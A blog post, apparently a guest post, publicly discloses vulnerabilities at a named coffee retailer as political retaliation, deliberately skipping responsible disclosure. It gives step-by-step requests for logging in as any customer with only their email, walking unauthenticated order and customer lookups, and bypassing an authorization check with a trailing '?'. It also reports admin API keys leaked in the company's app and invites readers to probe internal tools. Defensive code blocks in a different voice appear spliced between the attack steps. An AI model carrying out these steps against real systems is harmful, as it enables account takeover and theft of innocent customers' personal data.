Black Rifle Coffee Company: Zero Ethics, Zero Security

Originally Posted at FMShooter – Authored by Catboy

[Guest Post] Catboy is a conservative zoomer in his early twenties with years of experience in software engineering, application and network security, and product design. He currently works in financial tech in New York City.

Let’s start with the big reveal: if you have ever had an account with Black Rifle Coffee Company, or have ever placed an order with them, your personal information is at risk. To my knowledge, this does NOT include passwords or payment data.

The Black Rifle Coffee Company is once again getting headlines over its treatment of Kyle Rittenhouse, the 17-year-old hero who shot two criminals (one of whom was a serial child rapist) dead and took a bicep off another. BRCC’s CEO, Evan Hafer, liked a Tweet calling Rittenhouse a “LARPer,” a “punk ass,” and “a wannabe douchebag.” He called those protecting their private property from rioters “repugnant.” He has also been caught donating to ActBlue and to Barack Obama:

Whenever a company pulls something like this, I like to take a quick look at its network infrastructure and security, in the hope that I get to write a blog post like this one. Here is a summary, in case you don’t want to read the full analysis of their network:

  • All BRCC customer data is exposed, excluding passwords (handled by Shopify) and payment data (handled by Stripe).
  • You can log in as any BRCC customer without their password. You can edit their profile, place orders, and edit subscriptions just by knowing their email.
  • You can brute-force customer emails and order IDs through internal, unauthenticated lookup APIs. The order data returned includes (partial) payment data, tracking numbers, and other identifiers.
  • You can see every use of an employee discount code without logging in.
  • You could fuck with their custom Shopify integrations, though this probably won’t do much.
  • Other leads that have not been run down yet:
    • Other internal BRCC tools (*.apps.blackriflecoffee.com)
    • A potential query endpoint: https://data.blackriflecoffee.com/
    • A potential query endpoint: https://apps.customers.blackriflecoffee.com/
    • The B2B sales platform: https://dealer.blackriflecoffee.com

Usually, findings like these would be reported through HackerOne or another bug bounty program. Such a program passes the report to the company directly so it can fix the problem before anything is published, and pays a cash bounty to whoever found the bug. However, as BRCC didn’t give Kyle a chance for his case to be heard before damning him, we, in turn, are not waiting to divulge these findings or going through any responsible disclosure process. Call it karma.

A Warning

🛑 Do not perform these steps yourself unless you are well-versed in keeping your online identity secure. These are provided for security researchers to explore, and are for educational purposes only. These tutorials assume basic knowledge of application development. For anyone else, just look at the pictures.

A Prerequisite

🛑 Do not use information retrieved via the exploits to steal BRCC’s customer data. Their customers are not at fault here.

A Big Update

After completing this article, I took a look at the BRCC mobile application, not expecting to find anything. To my surprise, they embedded their Shopify Admin API keys inside their public mobile application, so if you have the mobile app installed, admin access to Black Rifle Coffee’s store exists on your device.

These keys cannot be used to edit the customer-facing website, unfortunately, but they can be used to create, edit, and delete orders, subscriptions, and customers. Also note that the Stripe keys here are publishable keys, which Stripe intends to ship in front-end code, so they are not sensitive; they are the exception. I redacted the ReCharge keys because too much of them was exposed in the screenshot.

Also embedded are keys to their subscription platform, ReCharge, an old (?) notification platform, Shopistry, and a custom push-notification application located at https://black-rifle-coffee.herokuapp.com. Each of these requires more investigation.
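Shipping Admin API keys inside a public app bundle is the kind of thing a pre-release check on your own build should catch. The following is an added example, my own code rather than BRCC’s, Shopify’s, or Stripe’s, of a small scanner run over the strings pulled from an app bundle. The key prefixes are the vendors’ documented formats (shpat_ for Shopify Admin API access tokens, shpss_ for Shopify app shared secrets, sk_/rk_ for Stripe secret and restricted keys, pk_ for Stripe publishable keys, which are flagged as informational only). The ReCharge token format is not public, so it is caught by a generic high-entropy rule instead. The sample bundle and every key value in it are constructed and fake.

```python
import math
import re
from collections import Counter
from typing import List, Tuple

# Prefixes are the vendors' documented key formats; the severity ranking is mine.
PATTERNS: List[Tuple[str, str, str]] = [
    ("shopify_admin_token", r"\bshpat_[0-9a-f]{32}\b", "critical"),
    ("shopify_app_secret",  r"\bshpss_[0-9a-f]{32}\b", "critical"),
    ("stripe_secret_key",   r"\b[sr]k_(?:live|test)_[0-9A-Za-z]{16,}\b", "critical"),
    ("stripe_publishable",  r"\bpk_(?:live|test)_[0-9A-Za-z]{16,}\b", "info"),
    ("heroku_app_url",      r"https://[a-z0-9-]+\.herokuapp\.com\b", "low"),
]
# Generic rule for vendors whose token format is not public (e.g. ReCharge):
# a credential-looking name followed by a long, high-entropy quoted value.
GENERIC = re.compile(r"(?i)(?:api[_-]?key|token|secret)\s*[:=]\s*[\"']([A-Za-z0-9_\-]{24,})[\"']")
SEVERITY_RANK = {"info": 0, "low": 1, "high": 2, "critical": 3}


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random tokens score well above prose."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def scan_bundle(text: str) -> List[Tuple[str, str, str]]:
    """Returns (rule, severity, matched value) for every credential found."""
    hits = []
    for name, pattern, severity in PATTERNS:
        for m in re.finditer(pattern, text):
            hits.append((name, severity, m.group(0)))
    already = {h[2] for h in hits}
    for m in GENERIC.finditer(text):
        value = m.group(1)
        if value not in already and shannon_entropy(value) > 3.5:
            hits.append(("generic_high_entropy", "high", value))
    return hits


def worst_severity(hits: List[Tuple[str, str, str]]) -> str:
    """Highest severity among the hits, or 'none' for a clean bundle."""
    return max((h[1] for h in hits), key=SEVERITY_RANK.get, default="none")


# Constructed strings as they might be pulled from a decompiled app; every value is fake.
SAMPLE_BUNDLE = """
SHOPIFY_STORE=example-store.myshopify.com
SHOPIFY_ADMIN_TOKEN=shpat_0123456789abcdef0123456789abcdef
STRIPE_PUBLISHABLE_KEY=pk_test_0000000000000000example
RECHARGE_API_TOKEN="Zx9QwErTyUiOpAsDfGhJkLzXcVbNm12345"
PUSH_ENDPOINT=https://example-app.herokuapp.com/push
APP_VERSION=2.3.1
"""

if __name__ == "__main__":
    findings = scan_bundle(SAMPLE_BUNDLE)
    for hit in findings:
        print(hit)
    print("worst:", worst_severity(findings))
```

Run it over `strings` output from an unpacked APK or IPA as a build gate: anything at "high" or "critical" should fail the build, while a publishable Stripe key is expected and only reported.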

 

The Exploits

1. Login as Any Customer

This one is so easy to perform that it is incredible it has not been found before.

  1. Send a POST request to https://account.blackriflecoffee.com/login with a JSON body of `{"email": "<any customer's email>"}`. No password or other proof of ownership is required.
  2. The response is a login URL containing a Shopify Multipass token.
  3. Click the URL. You land in a hidden internal BRCC tool with that user’s profile pulled up, and you can make any edits you would like.
  4. (optional) Instead of clicking, exchange the Multipass token for a regular Shopify customer access token through Shopify’s Storefront API (the Multipass customer-access-token exchange), then set your `shopify_customerToken` cookie on account.blackriflecoffee.com to that token. You now have that user’s account.blackriflecoffee.com session.

From here, you can edit profiles, place orders, edit subscriptions, edit addresses. Free coffee, I guess? Their coffee is kinda shit though, so this is mostly for fun.
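The flaw in the flow above is not Multipass itself but that a login URL is handed to anyone who can type an email address. The following is an added example, my own code and not BRCC’s or Shopify’s, that models the vulnerable endpoint beside a hardened passwordless design: the link is only ever sent to the address on file, it is signed, it expires, and it works once. The host `store.example`, the customer table, and the in-memory token store and outbox are constructed stand-ins; `mint_multipass_login_url` is a placeholder for real Multipass token generation, since the authorization gate in front of it is the point.

```python
import hashlib
import hmac
import os
import secrets
import time
from typing import Dict, List, Optional, Tuple

# Constructed sample customer table standing in for the store's customer records.
CUSTOMERS = {"alice@example.com": {"id": 1001, "name": "Alice"}}

# Hypothetical server-side signing secret (generated per process here; a real
# deployment keeps it in a secret store, never in an app bundle).
LINK_SECRET = os.urandom(32)
TOKEN_TTL_SECONDS = 15 * 60


def mint_multipass_login_url(email: str) -> str:
    """Stand-in for Shopify Multipass token generation. Real Multipass encrypts
    a JSON customer blob with a key derived from the store's Multipass secret;
    the token format is irrelevant here. What matters is who may obtain it."""
    return f"https://store.example/account/login/multipass/{secrets.token_urlsafe(24)}"


def vulnerable_login(email: str) -> Optional[str]:
    """Models the endpoint described in the post: knowing an email address is
    the only requirement, and the login URL goes straight back to the caller.
    (Returning None for unknown addresses also makes it an existence oracle.)"""
    if email not in CUSTOMERS:
        return None
    return mint_multipass_login_url(email)


# --- Hardened design: a signed, expiring, single-use link sent only to the inbox ---
PENDING: Dict[str, Tuple[str, int]] = {}   # token_id -> (email, expires_at)
OUTBOX: List[Tuple[str, str]] = []         # constructed stand-in for the mail system


def _sign(token_id: str, email: str, expires_at: int) -> str:
    msg = f"{token_id}|{email}|{expires_at}".encode()
    return hmac.new(LINK_SECRET, msg, hashlib.sha256).hexdigest()


def request_login_link(email: str, now: Optional[int] = None) -> str:
    """The link is never returned over HTTP; it is sent to the address on file,
    so the caller must control that inbox rather than merely know the address.
    The response is identical for known and unknown addresses."""
    now = int(time.time()) if now is None else now
    if email in CUSTOMERS:
        token_id = secrets.token_urlsafe(16)
        expires_at = now + TOKEN_TTL_SECONDS
        token = f"{token_id}.{expires_at}.{_sign(token_id, email, expires_at)}"
        PENDING[token_id] = (email, expires_at)
        OUTBOX.append((email, f"https://store.example/login/redeem?t={token}"))
    return "If that address has an account, a login link has been emailed to it."


def redeem_login_link(token: str, now: Optional[int] = None) -> Optional[str]:
    """Only after signature, expiry and single-use checks pass is the
    Multipass URL minted, and only for the email bound into the token."""
    now = int(time.time()) if now is None else now
    try:
        token_id, expires_str, sig = token.split(".")
        expires_at = int(expires_str)
    except ValueError:
        return None
    pending = PENDING.get(token_id)
    if pending is None:
        return None
    email, stored_expiry = pending
    if stored_expiry != expires_at or now > expires_at:
        return None
    if not hmac.compare_digest(sig, _sign(token_id, email, expires_at)):
        return None
    del PENDING[token_id]   # single use: a replayed or leaked link is dead
    return mint_multipass_login_url(email)
```

The same response for known and unknown addresses, plus rate limiting on the request endpoint (not shown), is what keeps a login-link endpoint from doubling as the email oracle the post describes.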

2. See Detailed Customer Data

  • Send a GET request to one of the following, replacing the email in the URL with any BRCC customer’s email address:

3. See Detailed Order Data

  • Send a GET request to https://account.blackriflecoffee.com/api/order/2760367571053. The endpoint requires no authentication. It may take a few tries to land on a valid order ID, but a script can do the guessing automatically.
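Sections 2 and 3 are the same bug twice: a record is fetched by an identifier (an email, an order ID) with neither a session nor a check that the record belongs to the caller. The following is an added example, my own code and not BRCC’s or Shopify’s, with the vulnerable lookup beside a hardened one that authenticates, authorizes against the object, and makes missing and foreign orders indistinguishable so the endpoint cannot be walked for valid IDs. The order table, IDs and people are constructed.

```python
from dataclasses import asdict, dataclass
from typing import Callable, Dict, Iterable, Optional


@dataclass(frozen=True)
class Order:
    id: int
    customer_id: int
    email: str
    card_last4: str
    tracking: str


# Constructed sample data; the IDs and people are made up, not real orders.
ORDERS: Dict[int, Order] = {
    2000000001: Order(2000000001, 1, "alice@example.com", "4242", "1Z999AA10123456784"),
    2000000002: Order(2000000002, 2, "bob@example.com",   "1111", "1Z999AA10123456785"),
    2000000005: Order(2000000005, 1, "alice@example.com", "4242", "1Z999AA10123456790"),
}


def vulnerable_get_order(order_id: int) -> Optional[dict]:
    """Models the endpoint the post describes: no session, no ownership check,
    and the full record (email, partial card data, tracking) goes back to
    whoever supplies a valid ID. A None for invalid IDs tells a walker which
    IDs are real."""
    order = ORDERS.get(order_id)
    return None if order is None else asdict(order)


def hardened_get_order(order_id: int, session_customer_id: Optional[int]) -> Optional[dict]:
    """Authenticate, then authorize against the object: the order must belong
    to the session's customer. Missing and foreign orders produce the same
    result, so the endpoint cannot be used to discover valid IDs."""
    if session_customer_id is None:
        return None
    order = ORDERS.get(order_id)
    if order is None or order.customer_id != session_customer_id:
        return None
    # Return only what the order page needs; the email is already the caller's.
    return {"id": order.id, "tracking": order.tracking, "card_last4": order.card_last4}


def hits_from_id_walk(lookup: Callable[[int], Optional[dict]], ids: Iterable[int]) -> int:
    """Counts how many candidate IDs yield a record. This is the check to run
    against your own staging data: an unauthenticated walker should get zero."""
    return sum(1 for i in ids if lookup(i) is not None)


if __name__ == "__main__":
    candidates = range(2000000000, 2000000010)
    print("vulnerable, no session:", hits_from_id_walk(vulnerable_get_order, candidates))
    print("hardened, no session:  ", hits_from_id_walk(lambda i: hardened_get_order(i, None), candidates))
    print("hardened, as customer 1:", hits_from_id_walk(lambda i: hardened_get_order(i, 1), candidates))
```

The email-keyed customer lookup in section 2 gets the same fix: the email is taken from the authenticated session, never from the URL, and the response never reveals whether an address exists.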

4. Get a Bunch of Valid Order IDs

For some context, BRCC runs a bunch of internal tools that sit between Shopify and its own systems. One of them is at https://apps.empdiscount.blackriflecoffee.com/. Note that this may give you an “Unauthorized” error, but you can get around that by appending a `?` to the URL, which fakes an empty query string: https://apps.empdiscount.blackriflecoffee.com/?. Lol.

Here you can get the details of anyone who has ever used an employee discount code. It’s in a UI so no instructions needed.
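The post does not say why a trailing `?` defeats the Unauthorized check. The following is an added, constructed illustration (my own code, not BRCC’s, and not a claim about what their guard actually does) of the most common cause of this bug class: an access rule matched against the raw request target instead of the normalized path, shown beside a default-deny guard that normalizes first. The protected and public path sets are hypothetical.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Hypothetical rule table as a naive guard might write it: deny these exact targets.
PROTECTED_TARGETS = {"/", "/admin"}


def vulnerable_guard(request_target: str, authenticated: bool) -> int:
    """Returns an HTTP status. The rule is compared against the raw request
    target, so '/?', '/?x=1', '//' and '/%2e' are all 'different' from '/'
    and sail past the check."""
    if request_target in PROTECTED_TARGETS and not authenticated:
        return 401
    return 200


def normalize_path(request_target: str) -> str:
    """Canonical path: query and fragment dropped, percent-decoding applied,
    dot segments resolved, repeated and trailing slashes collapsed."""
    raw_path = urlsplit(request_target).path
    path = posixpath.normpath("/" + unquote(raw_path))
    return re.sub(r"/{2,}", "/", path)   # posixpath.normpath keeps a leading '//'


PUBLIC_PATHS = {"/healthz", "/login"}


def hardened_guard(request_target: str, authenticated: bool) -> int:
    """Default deny on the normalized path: only an explicit allowlist is
    reachable without a session, and '?' cannot change which rule applies."""
    if normalize_path(request_target) in PUBLIC_PATHS:
        return 200
    return 200 if authenticated else 401


if __name__ == "__main__":
    for target in ["/", "/?", "/%61dmin/", "//admin/../admin/.", "/healthz?"]:
        print(f"{target!r:24} vulnerable={vulnerable_guard(target, False)} hardened={hardened_guard(target, False)}")
```

The general lesson is that an authorization decision should be made on the same canonical path the router uses, and the rule should be an allowlist of what is public, not a denylist of what is private.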

5. Fuck Around

There are a bunch of other internal apps like the employee discount one. None of them does anything special, but I’m sure something breaks somewhere:

  • https://apps.inventory.blackriflecoffee.com/?
  • https://apps.ghfulfillment.blackriflecoffee.com/?
  • https://apps.fulfillment.blackriflecoffee.com/?
  • https://apps.stickerclub.blackriflecoffee.com/?
    • Note: This one used to contain a log of every customer, but it seems to have been removed as of writing.

There are others, but they have no traditional UI attached, so they will need further investigation by others who have time on their hands.

Conclusion

Seems to me that Evan Hafer and the rest of BRCC should spend less time attacking minors on Twitter, and more time ensuring their customers are safe while shopping for their sub-par coffee.

Personally, I prefer https://stockingmillcoffee.com/ (https://twitter.com/smcroasters)

If you’re a security researcher who has found something else related to BRCC, feel free to reach out, and we’ll update this article and credit appropriately.

 

Editor’s note: Black Rifle Coffee Company should be extremely thankful that Catboy has the goodness in his heart not to abuse their very visible exploits in their website and payments processing, instead choosing to publicly share his findings via a blog post. A worse human being would have extracted all possible data and sold it to the highest bidder. A slightly less worse human being would have changed every customer’s name before mass placing orders to all of them indicating their true feelings for BRCC and Evan Hafer:

If BRCC had just spent less time and money commenting on politically charged court cases and contributing to political super PACs, they may have had the resources to develop a customer-facing website that wasn’t a complete security-riddled piece of shit, and Catboy would never have been able to write this post at all. This blog may not have much reach, but if Hafer or any BRCC employees ever get a chance to view this post, they should take it as a humbling experience and a lesson to not piss all over your customer base. More likely, he will cry like a pansy, and blame “the Drumpftards” for daring to take a cursory look at his disdain for not only his customers, but his customers’ security.
